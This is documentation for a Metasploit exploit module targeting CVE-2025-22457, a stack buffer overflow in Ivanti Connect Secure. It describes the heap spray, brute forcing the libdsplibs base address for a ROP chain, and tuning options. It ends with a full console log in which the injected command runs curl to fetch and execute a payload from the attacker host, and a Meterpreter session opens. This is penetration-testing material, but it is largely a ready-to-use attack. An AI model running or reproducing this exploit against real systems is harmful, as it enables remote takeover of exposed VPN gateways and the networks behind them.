## Vulnerable Application

This module exploits a Stack-based Buffer Overflow vulnerability in Ivanti
Connect Secure to achieve remote code execution (CVE-2025-22457). Versions
22.7R2.5 and earlier are vulnerable. Note that Ivanti Pulse Connect Secure,
Ivanti Policy Secure and ZTA gateways are also vulnerable but this module
doesn't support this software. Heap spray is used to place our payload in
memory at a predetermined location. Due to ASLR, the base address of
`libdsplibs` is unknown. This library is used by the exploit to build a ROP
chain and get command execution. As a result, the module will brute force this
address starting from  the address set by the `LIBDSPLIBS_ADDRESS` option.

Since this module needs to fill the processes memory with a large structure
using the heap spray technique, it might take a very long time to succeed. The
execution can be tweeked with the options described below.

Also, since this will create many sockets on your system, you might need to
increase the file descriptor limit with `ulimit` (e.g. `ulimit -n 65535`).

### Installation Steps
Get an Ivanti Security Appliance (ISA) or a Virtual Appliances (ISA-V Series)
with a vulnerable Ivanti Connect Secure installed.

Note that it is not possible to download a trial version of a Virtual Appliance
unless you contact sales and request a demo.

## Verification Steps
1. Start msfconsole
1. Do: `use linux/http/ivanti_connect_secure_stack_overflow_rce_cve_2025_22457`
1. Do: `exploit verbose=true lhost=<local host> rhosts=<remote host>`
1. You should get a Meterpreter session


## Options

### MAX_THREADS
The maximum number of threads to use when spraying (default: 32)

### WEB_CHILDREN
The number of `/home/bin/web` child processes the server uses. It's been
observed that the number of children the main process forks is directly related
to the number of vCPUs used by the system. Ivanti recommends having 4 vCPUs, so
the default number of children is set to 4.
Note that this option should be set properly, since the exploit needs to send enough
spray patterns to fill the memory of each child process. This is mandatory,
since we don’t control which child process will be used to trigger the
vulnerability. If we send too much data, the process memory will overflow and
the process will crash. A `Broken pipe` socket error will happen in this case.
So, if the number of `WEB_CHILDREN` is too low (< vCPUs), we might not send
enough data to fill the memory of every child process and the exploit would
likely fail. This scenario cannot be detected since the child processes should
not crash. The module will simply continue to brute force with a different base
address of `libdsplibs`, without detecting the real issue. On the other hand,
if we send too much data, the child processes will crash and we will need to
start everything again with a lower `WEB_CHILDREN` value.

### LIBDSPLIBS_ADDRESS
The base address of libdsplibs that the module will start with when brute
forcing. It has been observed that this address is always in the range of
`0xf6525000`-`0xf6426000`, giving 256 possible options, since the alignment is
4KB (0x1000 bytes) bytes. As a result, the default value has been set to
`0xf6426000`.

### BRUTEFORCE_ATTEMPTS
The number of attempts to brute force the base address of libdsplibs (default: 255).


## Scenarios

### Ivanti Connect Secure version 22.7r2.4 b3597

In this example, the address of libdsplibs is known to speed up the process (0xf64c1000). Also, we know the target system runs with 2 vCPUs.

```
msf6 exploit(linux/http/ivanti_connect_secure_stack_overflow_rce_cve_2025_22457) > exploit verbose=true lhost=192.168.222.97 rhosts=192.168.222.222 libdsplibs_address=0xf64c1000 web_children=2
[*] Command to run on remote host: curl -so ./pbPNUixqDiK http://192.168.222.97:8080/QAeBnT-6WHJiW5MJjwMrfA;chmod +x ./pbPNUixqDiK;./pbPNUixqDiK&
[*] Fetch handler listening on 192.168.222.97:8080
[*] HTTP server started
[*] Adding resource /QAeBnT-6WHJiW5MJjwMrfA
[*] Started reverse TCP handler on 192.168.222.97:4444
[*] 192.168.222.222:443 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.222.222:443 - Checking the product version for https://192.168.222.222:443
[+] 192.168.222.222:443 - The target appears to be vulnerable. Detected version: 22.7.2.3597
[*] 192.168.222.222:443 - shell_cmd: a;export LD_LIBRARY_PATH=/home/lib;curl -so ./pbPNUixqDiK http://192.168.222.97:8080/QAeBnT-6WHJiW5MJjwMrfA;chmod +x ./pbPNUixqDiK;./pbPNUixqDiK& #BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
[*] 192.168.222.222:443 - Targeting https://192.168.222.222:443
[*] 192.168.222.222:443 - Starting...
[*] 192.168.222.222:443 - Trying libdsplibs.so @ 0xf64c1000
[*] 192.168.222.222:443 - Making connections...
[*] 192.168.222.222:443 - Spraying...
[*] 192.168.222.222:443 - Triggering...
[*] 192.168.222.222:443 - Attempt #1
[*] 192.168.222.222:443 - Attempt #2
[*] Client 192.168.222.222 requested /QAeBnT-6WHJiW5MJjwMrfA
[*] Sending payload to 192.168.222.222 (curl/7.80.0-DEV)
[*] Meterpreter session 1 opened (192.168.222.97:4444 -> 192.168.222.222:16758) at 2025-04-30 21:36:49 +0200
[!] 192.168.222.222:443 - Exception: The connection with (192.168.222.222:443) timed out.
[*] 192.168.222.222:443 - Attempt elapsed time: 222.46986142301466 seconds
[*] 192.168.222.222:443 - Total elapsed time: 227.48146175200236 seconds

meterpreter > sysinfo
Computer     : 192.168.222.222
OS           : CentOS 7.9.2009 (Linux 4.17.00.35-selinux-jailing-production)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: nr
```
